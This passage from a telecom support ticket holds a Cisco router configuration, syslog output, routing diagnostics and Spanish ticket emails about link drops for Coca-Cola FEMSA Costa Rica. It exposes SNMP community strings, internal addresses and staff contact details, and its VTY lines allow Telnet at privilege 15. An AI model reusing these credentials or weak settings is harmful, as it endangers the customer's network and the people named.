 PERMIT IP ANY 191.100.210.0 0.0.0.255
 REMARK --- AZURE SERVERS SAP - EXPRESS ROUTE II ---
 PERMIT IP 10.155.0.0 0.0.255.255 ANY
 PERMIT IP ANY 10.155.0.0 0.0.255.255
 REMARK --- AS 400 MX ---
 PERMIT IP ANY HOST 191.100.211.143
 PERMIT IP ANY HOST 191.100.211.144
 PERMIT IP ANY HOST 191.100.211.146
 PERMIT IP ANY HOST 191.100.212.143
 PERMIT IP ANY HOST 191.100.212.144
 PERMIT IP ANY HOST 191.100.213.146
 PERMIT IP ANY HOST 191.100.214.144
 PERMIT IP ANY HOST 191.100.214.145
 PERMIT IP ANY HOST 191.100.214.146
 PERMIT IP ANY HOST 191.100.214.147
 REMARK --- CLUSTER NODE 1/2/3 ---
 PERMIT IP ANY HOST 10.121.10.131
 REMARK --- SAP HOMOLOGADO FP1 ---
 PERMIT TCP ANY 131.150.197.0 0.0.0.255 RANGE 3200 3213
 PERMIT TCP ANY 131.150.197.0 0.0.0.255 RANGE 3300 3313
 PERMIT TCP ANY 131.150.197.0 0.0.0.255 RANGE 3800 3813
 REMARK --- SAP HANA NFS ECP ---
 PERMIT IP ANY HOST 10.138.19.15
 PERMIT IP ANY HOST 10.138.19.17
 REMARK --- SAP HANA NFS ECQ ---
 PERMIT IP ANY HOST 10.138.19.64
 PERMIT IP ANY HOST 10.138.19.66
 REMARK --- SAP HANA NFS BCP ---
 PERMIT IP ANY HOST 10.138.20.15
 PERMIT IP ANY HOST 10.138.20.17
 REMARK --- SAP HANA NFS BCD ---
 PERMIT IP ANY HOST 10.138.20.125
 PERMIT IP ANY HOST 10.138.20.127
 REMARK --- SAP HANA NFS BCQ ---
 PERMIT IP ANY HOST 10.138.20.85
 PERMIT IP ANY HOST 10.138.20.87
 REMARK --- SAP VSPS ---
 PERMIT IP ANY 10.138.23.0 0.0.0.255
 REMARK --- SAP ECC Y SATELITES ---
 PERMIT IP 10.138.2.0 0.0.0.255 ANY
 PERMIT IP ANY 10.138.2.0 0.0.0.255
 PERMIT IP 10.138.3.0 0.0.0.255 ANY
 PERMIT IP ANY 10.138.3.0 0.0.0.255
 PERMIT IP 10.138.5.0 0.0.0.255 ANY
 PERMIT IP ANY 10.138.5.0 0.0.0.255
 REMARK --- WEB DISPATCHER ENTERPRISE PORTAL ---
 PERMIT IP ANY HOST 10.121.11.50
 PERMIT IP ANY HOST 10.121.11.51
 PERMIT IP ANY HOST 10.121.11.52
 PERMIT IP ANY HOST 10.121.11.53
 PERMIT IP ANY HOST 10.121.11.54
 PERMIT IP ANY HOST 10.121.11.55
 PERMIT IP ANY HOST 10.121.11.56
 REMARK --- SAP RH MONTERREY ---
 PERMIT IP ANY 10.50.48.0 0.0.0.255
 PERMIT IP ANY 10.50.56.0 0.0.0.255
 PERMIT IP ANY 10.50.80.0 0.0.0.255
 PERMIT IP ANY 10.53.56.0 0.0.0.255
IP ACCESS-LIST EXTENDED ACL_QOS_KOF_VOICE
 REMARK --- KOF VOICE CEDI AGUADULCE ---
 PERMIT IP 10.148.179.128 0.0.0.63 ANY
 PERMIT IP ANY 10.148.179.128 0.0.0.63
IP ACCESS-LIST EXTENDED ACL_QOS_MANAGEMENT_PROTOCOLS
 REMARK *** ACL FOR MANAGEMENT PROTOCOLS: TELNET - SSH - TACACS - SNMP - SYSLOG - NTP ***
 PERMIT TCP ANY ANY EQ TACACS
 PERMIT TCP ANY EQ TACACS ANY
 PERMIT TCP ANY ANY EQ TELNET
 PERMIT TCP ANY EQ TELNET ANY
 PERMIT TCP ANY ANY EQ 22
 PERMIT TCP ANY EQ 22 ANY
 PERMIT UDP ANY ANY EQ SNMP
 PERMIT UDP ANY EQ SNMP ANY
 PERMIT UDP ANY ANY EQ SNMPTRAP
 PERMIT UDP ANY EQ SNMPTRAP ANY
 PERMIT UDP ANY ANY EQ NTP
 PERMIT UDP ANY EQ NTP ANY
 PERMIT UDP ANY ANY EQ SYSLOG
 PERMIT UDP ANY EQ SYSLOG ANY
IP ACCESS-LIST EXTENDED ACL_QOS_TEAMS_APPSHARING
 REMARK *** TRAFFIC MICROSOFT TEAMS - APPSHARING - AF21 ***
 PERMIT TCP ANY ANY RANGE 50040 50059
 PERMIT TCP ANY RANGE 50040 50059 ANY
 PERMIT UDP ANY ANY RANGE 50040 50059
 PERMIT UDP ANY RANGE 50040 50059 ANY
IP ACCESS-LIST EXTENDED ACL_QOS_TEAMS_VIDEO
 REMARK *** TRAFFIC MICROSOFT TEAMS - VIDEO - AF41 ***
 PERMIT TCP ANY ANY RANGE 50000 50019
 PERMIT TCP ANY RANGE 50000 50019 ANY
 PERMIT UDP ANY ANY RANGE 50020 50039
 PERMIT UDP ANY RANGE 50020 50039 ANY
IP ACCESS-LIST EXTENDED ACL_QOS_TEAMS_VOICE
 REMARK *** TRAFFIC MICROSOFT TEAMS - VOICE - EF ***
 PERMIT TCP ANY ANY RANGE 50000 50019
 PERMIT TCP ANY RANGE 50000 50019 ANY
 PERMIT UDP ANY ANY RANGE 50000 50019
 PERMIT UDP ANY RANGE 50000 50019 ANY
IP ACCESS-LIST EXTENDED ACL_QOS_VIDEO
 REMARK *** TRAFFIC H.323 ADDITIONAL PORTS H.245 STATIC ***
 PERMIT TCP ANY ANY RANGE 5555 6555
 REMARK *** TRAFFIC H.323 RTP VIDEO  ***
 PERMIT UDP ANY ANY RANGE 2326 2487
 PERMIT UDP ANY RANGE 2326 2487 ANY
IP ACCESS-LIST EXTENDED ACL_QOS_VOICE_RTP
 REMARK *** TRAFFIC REAL TIME - VOICE ***
 PERMIT UDP ANY ANY RANGE 16384 32767
 PERMIT UDP ANY RANGE 16384 32767 ANY
IP ACCESS-LIST EXTENDED ACL_QOS_VOICE_SIGNALING
 REMARK *** TRAFFIC H.323 ***
 PERMIT UDP ANY EQ 1718 ANY
 PERMIT UDP ANY ANY EQ 1718
 PERMIT UDP ANY EQ 1719 ANY
 PERMIT UDP ANY ANY EQ 1719
 PERMIT TCP ANY EQ 1720 ANY
 PERMIT TCP ANY ANY EQ 1720
 PERMIT TCP ANY EQ 1731 ANY
 PERMIT TCP ANY ANY EQ 1731
 PERMIT TCP ANY ANY RANGE 11000 11999
 REMARK *** TRAFFIC SCCP ***
 PERMIT TCP ANY EQ 2000 ANY
 PERMIT TCP ANY ANY EQ 2000
 PERMIT TCP ANY EQ 2001 ANY
 PERMIT TCP ANY ANY EQ 2001
 PERMIT TCP ANY EQ 2002 ANY
 PERMIT TCP ANY ANY EQ 2002
 PERMIT TCP ANY EQ 2443 ANY
 PERMIT TCP ANY ANY EQ 2443
 PERMIT TCP ANY EQ 3224 ANY
 PERMIT TCP ANY ANY EQ 3224
 REMARK *** TRAFFIC MGCP ***
 PERMIT UDP ANY EQ 2427 ANY
 PERMIT UDP ANY ANY EQ 2427
 PERMIT TCP ANY EQ 2427 ANY
 PERMIT TCP ANY ANY EQ 2427
 PERMIT TCP ANY EQ 2428 ANY
 PERMIT TCP ANY ANY EQ 2428
 PERMIT UDP ANY EQ 2727 ANY
 PERMIT UDP ANY ANY EQ 2727
 PERMIT TCP ANY EQ 2727 ANY
 PERMIT TCP ANY ANY EQ 2727
 REMARK *** TRAFFIC SIP ***
 PERMIT UDP ANY EQ 5060 5061 ANY
 PERMIT UDP ANY ANY EQ 5060 5061
 PERMIT TCP ANY EQ 5060 5061 ANY
 PERMIT TCP ANY ANY EQ 5060 5061
!
!
IP PREFIX-LIST PFX_LOOPBACK SEQ 5 PERMIT 10.99.65.210/32
!
ROUTE-MAP FILTRO_TO_CLARO_OUT PERMIT 20
 MATCH AS-PATH 20
!
ROUTE-MAP FILTRO_TO_CLARO_OUT PERMIT 30
 MATCH IP ADDRESS PREFIX-LIST PFX_LOOPBACK
!
ROUTE-MAP FILTRO_FROM_FEMSA_CR_IN PERMIT 10
 MATCH AS-PATH 20
 SET COMMUNITY 966982794
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY MON003444D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION CALLE BLANCOS, GOICOECHEA
ACCESS-LIST 10 DENY   172.19.10.28 0.0.0.3
ACCESS-LIST 10 PERMIT ANY
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 88 PERMIT 190.148.130.0 0.0.0.63
!
CONTROL-PLANE
!
!
!
LINE CON 0
 LOGIN LOCAL
LINE AUX 0
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_FEMSA_CR_CALLEBLANCOS#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 3 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 29456 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 4 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 29456 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 29459 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:23:18.893: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 00:24:13.929: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:24:18.929: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 00:25:03.965: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:25:08.965: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 00:26:14.001: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:26:39.037: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 00:26:54.037: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:26:59.037: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 00:28:14.073: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:28:19.073: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 00:29:44.145: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 00:29:49.145: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:45:57.696: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:46:02.696: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:47:52.768: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:47:57.768: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:48:52.804: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:48:57.804: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:50:12.840: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:50:17.840: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:51:22.876: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:51:27.876: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:53:02.948: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:53:07.948: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:53:32.948: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:53:37.948: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 06:59:13.164: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 06:59:18.164: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 11 07:02:23.271: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 11 07:02:28.271: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 13 22:55:05.968: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 13 22:55:11.004: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 13 22:55:26.004: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 13 22:55:31.004: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 14 06:43:52.882: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 14 06:43:57.882: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 14 06:44:22.882: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 14 06:44:27.918: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY DOWN -&gt; UP
*DEC 14 15:23:24.908: %TRACK-6-STATE: 1 IP SLA 1 REACHABILITY UP -&gt; DOWN
*DEC 14 15:23:24.908: %TRACK-6-STATE: 2 IP SLA 2 REACHABILITY UP -&gt; DOWN
*DEC 19 14:00:12.878: %TRACK-6-STATE: 4 IP SLA 4 REACHABILITY UP -&gt; DOWN
*DEC 19 14:01:07.878: %TRACK-6-STATE: 4 IP SLA 4 REACHABILITY DOWN -&gt; UP
*DEC 19 14:19:11.670: %OSPF-5-ADJCHG: PROCESS 100, NBR 10.148.0.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*DEC 19 14:19:13.618: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*DEC 19 14:19:14.618: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 14:29:13.866: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 15:03:24.934: %OSPF-5-ADJCHG: PROCESS 100, NBR 10.201.1.89 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*DEC 19 15:04:15.186: %TRACK-6-STATE: 4 IP SLA 4 REACHABILITY UP -&gt; DOWN
*DEC 19 15:05:55.222: %TRACK-6-STATE: 3 IP SLA 3 REACHABILITY UP -&gt; DOWN
*DEC 19 15:06:02.362: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON CONSOLE
*DEC 19 15:08:47.194: %BGP-5-NBR_RESET: NEIGHBOR 10.201.1.89 ACTIVE RESET (PEER CLOSED THE SESSION)
*DEC 19 15:08:47.194: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 10.201.1.89 IPV4 UNICAST VPN VRF FEMSA_LITE TOPOLOGY BASE REMOVED FROM SESSION  PEER CLOSED THE SESSION
*DEC 19 15:08:48.758: %BGP-5-ADJCHANGE: NEIGHBOR 10.201.1.89 VPN VRF FEMSA_LITE UP
*DEC 19 15:11:33.458: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 15:11:36.542: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 15:11:37.542: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 15:11:59.250: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*DEC 19 15:12:28.286: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*DEC 19 15:12:28.366: %BGP-5-ADJCHANGE: NEIGHBOR 172.19.10.1 VPN VRF FEMSA_LITE UP
*DEC 19 15:14:15.950: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 15:57:12.978: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 15:57:34.442: %BGP-5-NBR_RESET: NEIGHBOR 172.19.10.1 RESET (INTERFACE FLAP)
*DEC 19 15:57:34.450: %BGP-5-ADJCHANGE: NEIGHBOR 172.19.10.1 VPN VRF FEMSA_LITE DOWN INTERFACE FLAP
*DEC 19 15:57:34.450: %BGP_SESSION-5-ADJCHANGE: NEIGHBOR 172.19.10.1 IPV4 UNICAST VPN VRF FEMSA_LITE TOPOLOGY BASE REMOVED FROM SESSION  INTERFACE FLAP
*DEC 19 15:57:36.390: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*DEC 19 15:57:37.390: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 15:57:38.382: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 16:12:00.194: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*DEC 19 16:12:00.378: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*DEC 19 16:12:03.542: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 16:12:04.542: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*DEC 19 16:12:08.462: %BGP-5-ADJCHANGE: NEIGHBOR 172.19.10.1 VPN VRF FEMSA_LITE UP
*JAN 31 17:57:20.901: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 16:16:18.760: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 20:46:35.027: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB  3 22:55:34.738: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 23:10:31.050: %CLEAR-5-COUNTERS: CLEAR COUNTER ON INTERFACE GIGABITETHERNET0/1 BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  3 23:56:57.934: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB  8 14:52:27.862: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*FEB  8 14:54:42.014: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.10.65)
*FEB 15 22:57:20.423: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 15:06:35.955: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 15:17:38.434: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 15:33:41.834: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*FEB 16 21:41:28.777: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY1 (10.201.1.89)
*APR 28 23:33:23.094: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  2 19:44:24.975: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  4 15:13:43.044: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 15:25:02.684: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 16:11:01.284: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:11:49.919: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:38:47.559: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
CC_FEMSA_CR_CALLEBLANCOS#
SHOW CLOCK
*00:43:41.459 UTC FRI JUN 10 2022
CC_FEMSA_CR_CALLEBLANCOS#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
CC_FEMSA_CR_CALLEBLANCOS#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       LAN DEL CLIENTE
GI0/1                          UP             UP       WAN PRINCIPAL/_/CONTR0001285737OC/_/
GI0/2                          ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
CC_FEMSA_CR_CALLEBLANCOS#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         172.19.10.2     YES MANUAL UP                    UP
GIGABITETHERNET0/1         10.201.1.90     YES MANUAL UP                    UP
GIGABITETHERNET0/2         UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.99.65.210    YES MANUAL UP                    UP
CC_FEMSA_CR_CALLEBLANCOS#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DATOS_FEMSA_CR 10.201.1.90
  PING 10.201.1.90: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.201.1.90 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.36.7
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_FEMSA_CR 10.201.1.90
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_FEMSA_CR
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.201.1.90/32  DIRECT  0    0                 0.0.0.0         VLANIF204			</t>
  </si>
  <si>
    <t>SE AGREGA LA INFORMACION SOLICITADA POR BACK OFFICE
PE: 10.179.36.7
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DATOS_FEMSA_CR 10.201.1.90
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DATOS_FEMSA_CR
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.201.1.90/32  DIRECT  0    0                 0.0.0.0         VLANIF204</t>
  </si>
  <si>
    <t>ESTIMADOS BACK OFFICE SOLICITO SU APOYO REVIZANDO LA RUTA DE EL ENLACE YA QUE EL CLIENTE FEMSA INDICA QUE TIEME MUCHA INTERMITENCIA Y NO ALCANZA ALGUNOS SALTOS POR MOMENTOS ADJUNTO LA TRAZA QUE REALIZO EL CLIENTE.
SW-KOF-CRC-CLBL-DATA-CS01#TRACEROUTE 10.124.10.1
TYPE ESCAPE SEQUENCE TO ABORT.
TRACING THE ROUTE TO 10.124.10.1
VRF INFO: (VRF IN NAME/ID, VRF OUT NAME/ID)
1 172.19.10.2 [AS 64650] 0 MSEC 0 MSEC 0 MSEC
2 10.201.1.89 [AS 64650] 3 MSEC 2 MSEC 2 MSEC
3 10.201.53.205 [AS 14754] 24 MSEC 5 MSEC 4 MSEC
4 10.201.53.206 [AS 14754] 8 MSEC 8 MSEC 8 MSEC
5 * * *
6 * * *
7 * * *
8 * * *
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
16 * * *
17 * * *
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA  QUE REALICE PRUEBAS COLA DE CORREO</t>
  </si>
  <si>
    <t>F4596206</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL CLIENTE YA BRINDO INFORMACIÓN EN LA COLA DE CORREOS:
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
IMPORTANCIA: ALTA
Y SE LE RESPONDE:
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
BUEN DÍA ESTIMADOS.
       EN SEGUIMIENTO AL CORREO QUE ANTECEDE, AGRADECEMOS EL REPORTE ENVIADO CON GUSTO ESTAREMOS VALIDANDO Y BRINDANDO EL SEGUIMIENTO PARA EL CORRECTO FUNCIONAMIENTO @GRUPON1 FAVOR DE BRINDAR EL SOPORTE.
CUALQUIER CONSULTA O DUDA ESTAMOS A LA ORDEN.
FAVOR DE BRINDAR EL SEGUIMIENTO SE CAMBIA A WIP SE NOTIFICA AL GESTOR GERSON.AJPACAJA VIA SKYPE</t>
  </si>
  <si>
    <t>###SE RECIBE CORREO DEL CLIENTE##
CONFIRMANDO UNA VENTANA PARA EL DIA DE MAÑANA PARA MEDIO DIA
DE: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 10:14
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&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
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CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; PEREZ ARIAS, ESTEBAN ANDRES &lt;E.PEREZARIAS@DXC.COM&gt;; GONZALEZ, EMANUEL &lt;EMANUEL.GONZALEZ@DXC.COM&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
EQUIPO CLARO,
SE TIENE LA VENTANA AUTORIZADA PARA MAÑANA MARTES A LAS 12 MEDIO DÍA, FAVOR DE CONFIRMAR.
GRACIAS,
ESTEBAN PEREZ A
NETWORK OPERATION CENTER, NETOPS
DXC TECHNOLOGY
T +1.866.818.2106 OPT 3 (55.4440.1942 MX)
E.PEREZARIAS@DXC.COM
ULTRA PARK II, EDIF. #2
LAGUNILLA DE HEREDIA, COSTA RICA
GMT -6 CENTRAL AMERICA
DXC.COM | TWITTER* | FACEBOOK* | LINKEDIN* | CAMPAIGN PROMOTION*</t>
  </si>
  <si>
    <t>###SE PROCEDE A CONFIRMARLE AL CLIENTE LA VISITA PARA EL DIA DE MAÑANA 14/06/2022  A LAS 12 PM ##
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 12:02
